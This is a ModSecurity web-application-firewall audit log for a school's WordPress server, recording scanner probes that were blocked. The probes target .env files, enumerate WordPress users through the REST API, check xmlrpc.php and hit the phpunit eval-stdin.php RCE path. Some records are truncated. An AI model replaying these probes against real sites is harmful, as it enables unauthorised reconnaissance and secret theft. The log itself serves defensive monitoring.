Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 154.53.62.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.53.62.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d750c76b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d750c76b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747073760039899 2772 (- - -) Stopwatch2: 1747073760039899 2772; combined=1300, p1=493, p2=779, p3=0, p4=0, p5=28, sr=79, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d750c76b-Z-- --0f9ad727-A-- [13/May/2025:02:05:54 +0700] aCJGkhKpX3ymKhxxBsjAWAAAAE4 103.236.140.4 55274 103.236.140.4 8181 --0f9ad727-B-- GET /.env.test HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --0f9ad727-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0f9ad727-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076754785033 900 (- - -) Stopwatch2: 1747076754785033 900; combined=447, p1=405, p2=0, p3=0, p4=0, p5=42, sr=133, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0f9ad727-Z-- --e544015c-A-- [13/May/2025:02:06:01 +0700] aCJGmRKpX3ymKhxxBsjAcAAAAEM 103.236.140.4 55416 103.236.140.4 8181 --e544015c-B-- GET /.env.development.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --e544015c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e544015c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076761372053 730 (- - -) Stopwatch2: 1747076761372053 730; combined=318, p1=274, p2=0, p3=0, p4=0, p5=44, sr=102, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e544015c-Z-- --082ec00f-A-- [13/May/2025:02:06:03 +0700] aCJGmxKpX3ymKhxxBsjAegAAAEw 103.236.140.4 55466 103.236.140.4 8181 --082ec00f-B-- GET /.env.bak HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --082ec00f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --082ec00f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076763852789 905 (- - -) Stopwatch2: 1747076763852789 905; combined=389, p1=349, p2=0, p3=0, p4=0, p5=40, sr=126, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --082ec00f-Z-- --bd2eae25-A-- [13/May/2025:02:06:06 +0700] aCJGnhKpX3ymKhxxBsjAgQAAAEU 103.236.140.4 55516 103.236.140.4 8181 --bd2eae25-B-- GET /.env.dev HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --bd2eae25-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd2eae25-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076766621191 816 (- - -) Stopwatch2: 1747076766621191 816; combined=379, p1=336, p2=0, p3=0, p4=0, p5=43, sr=122, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd2eae25-Z-- --46fb0a24-A-- [13/May/2025:02:06:09 +0700] aCJGoRKpX3ymKhxxBsjAigAAAEk 103.236.140.4 55566 103.236.140.4 8181 --46fb0a24-B-- GET /.env.dev.local HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 93.123.109.230 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 93.123.109.230 X-Forwarded-Proto: https Connection: close User-Agent: l9explore/1.2.2 --46fb0a24-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --46fb0a24-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747076769224811 775 (- - -) Stopwatch2: 1747076769224811 775; combined=307, p1=262, p2=0, p3=0, p4=0, p5=45, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --46fb0a24-Z-- --5f09ad4e-A-- [13/May/2025:02:13:20 +0700] aCJIUH4i-S7TW27OkGkGzQAAAMM 103.236.140.4 36896 103.236.140.4 8181 --5f09ad4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.234 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5f09ad4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5f09ad4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747077200021002 3106 (- - -) Stopwatch2: 1747077200021002 3106; combined=1372, p1=459, p2=879, p3=0, p4=0, p5=34, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f09ad4e-Z-- --48b81c5e-A-- [13/May/2025:02:13:22 +0700] aCJIUhKpX3ymKhxxBsjDjwAAAEc 103.236.140.4 36944 103.236.140.4 8181 --48b81c5e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.81.234 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.81.234 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --48b81c5e-C-- demo.sayHello --48b81c5e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --48b81c5e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747077202803785 8406 (- - -) Stopwatch2: 1747077202803785 8406; combined=6550, p1=784, p2=5444, p3=50, p4=69, p5=116, sr=95, sw=87, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48b81c5e-Z-- --a8f0e116-A-- [13/May/2025:02:17:28 +0700] aCJJSBKpX3ymKhxxBsjEkgAAAEs 103.236.140.4 42724 103.236.140.4 8181 --a8f0e116-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 182.16.186.2 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 182.16.186.2 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --a8f0e116-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8f0e116-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747077448771891 2849 (- - -) Stopwatch2: 1747077448771891 2849; combined=1350, p1=429, p2=891, p3=0, p4=0, p5=29, sr=71, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8f0e116-Z-- --525bf14d-A-- [13/May/2025:02:39:19 +0700] aCJOZ-ll0ld2l7Li0sfLtgAAAJI 103.236.140.4 43884 103.236.140.4 8181 --525bf14d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 185.145.185.123 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 185.145.185.123 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --525bf14d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --525bf14d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747078759994975 3128 (- - -) Stopwatch2: 1747078759994975 3128; combined=1243, p1=470, p2=740, p3=0, p4=0, p5=32, sr=121, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --525bf14d-Z-- --cc719548-A-- [13/May/2025:02:42:55 +0700] aCJPP-ll0ld2l7Li0sfNjgAAAIs 103.236.140.4 49186 103.236.140.4 8181 --cc719548-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.91.172.231 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.91.172.231 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cc719548-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cc719548-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747078975897207 2750 (- - -) Stopwatch2: 1747078975897207 2750; combined=1219, p1=409, p2=781, p3=0, p4=0, p5=29, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cc719548-Z-- --729fc834-A-- [13/May/2025:03:02:06 +0700] aCJTvn4i-S7TW27OkGkgiAAAAMU 103.236.140.4 38802 103.236.140.4 8181 --729fc834-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.68.193.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.68.193.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --729fc834-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --729fc834-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747080126009442 2523 (- - -) Stopwatch2: 1747080126009442 2523; combined=1266, p1=398, p2=835, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --729fc834-Z-- --95805043-A-- [13/May/2025:03:04:14 +0700] aCJUPhLjIumP119c9pq3jgAAAAM 103.236.140.4 43114 103.236.140.4 8181 --95805043-B-- POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 152.42.227.246 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 152.42.227.246 X-Forwarded-Proto: https Connection: close Content-Length: 27 User-Agent: python-requests/2.32.3 Accept: */* Content-Type: application/x-www-form-urlencoded --95805043-C-- --95805043-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --95805043-E-- --95805043-H-- Message: Access denied with code 403 (phase 2). String match " --7f19d112-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7f19d112-E-- --7f19d112-H-- Message: Access denied with code 403 (phase 2). String match " --57f28342-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --57f28342-E-- --57f28342-H-- Message: Access denied with code 403 (phase 2). String match " --33d2935c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --33d2935c-H-- Message: Access denied with code 403 (phase 2). String match " --ab820a37-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ab820a37-E-- --ab820a37-H-- Message: Access denied with code 403 (phase 2). String match " --13d41745-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --13d41745-E-- --13d41745-H-- Message: Access denied with code 403 (phase 2). String match " --afd9ad05-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --afd9ad05-H-- Message: Access denied with code 403 (phase 2). String match " --82ecc732-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --82ecc732-E-- --82ecc732-H-- Message: Access denied with code 403 (phase 2). String match " demo.sayHello --508f641d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --508f641d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747104775413335 4580 (- - -) Stopwatch2: 1747104775413335 4580; combined=3128, p1=424, p2=2526, p3=24, p4=25, p5=74, sr=52, sw=55, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --508f641d-Z-- --abc1112b-A-- [13/May/2025:10:03:35 +0700] aCK2h43mg5f2L4Eof6PIwgAAANU 103.236.140.4 36064 103.236.140.4 8181 --abc1112b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 51.8.118.148 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 51.8.118.148 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --abc1112b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --abc1112b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747105415646761 3409 (- - -) Stopwatch2: 1747105415646761 3409; combined=1508, p1=530, p2=947, p3=0, p4=0, p5=31, sr=121, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --abc1112b-Z-- --5e332e4e-A-- [13/May/2025:10:06:31 +0700] aCK3N43mg5f2L4Eof6PI1QAAAMM 103.236.140.4 36132 103.236.140.4 8181 --5e332e4e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --5e332e4e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --5e332e4e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747105591036103 3125 (- - -) Stopwatch2: 1747105591036103 3125; combined=1404, p1=481, p2=891, p3=0, p4=0, p5=32, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5e332e4e-Z-- --322df417-A-- [13/May/2025:10:06:35 +0700] aCK3O43mg5f2L4Eof6PI1gAAANg 103.236.140.4 36138 103.236.140.4 8181 --322df417-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.138.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.138.98 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --322df417-C-- demo.sayHello --322df417-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --322df417-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747105595915572 5734 (- - -) Stopwatch2: 1747105595915572 5734; combined=4369, p1=500, p2=3627, p3=35, p4=39, p5=98, sr=72, sw=70, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --322df417-Z-- --642acd41-A-- [13/May/2025:10:16:10 +0700] aCK5eq50YiewH3i7i4efowAAAAE 103.236.140.4 36280 103.236.140.4 8181 --642acd41-B-- GET /.env HTTP/1.0 Host: petruk.hauganslekt.no X-Real-IP: 139.59.143.102 X-Forwarded-Host: petruk.hauganslekt.no X-Forwarded-Server: petruk.hauganslekt.no X-Forwarded-For: 139.59.143.102 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --642acd41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --642acd41-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747106170002263 859 (- - -) Stopwatch2: 1747106170002263 859; combined=332, p1=291, p2=0, p3=0, p4=0, p5=41, sr=81, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --642acd41-Z-- --862b634d-A-- [13/May/2025:10:24:47 +0700] aCK7f43mg5f2L4Eof6PKugAAAMo 103.236.140.4 37232 103.236.140.4 8181 --862b634d-B-- GET /.env.zip HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 178.128.17.205 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 178.128.17.205 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3 --862b634d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: 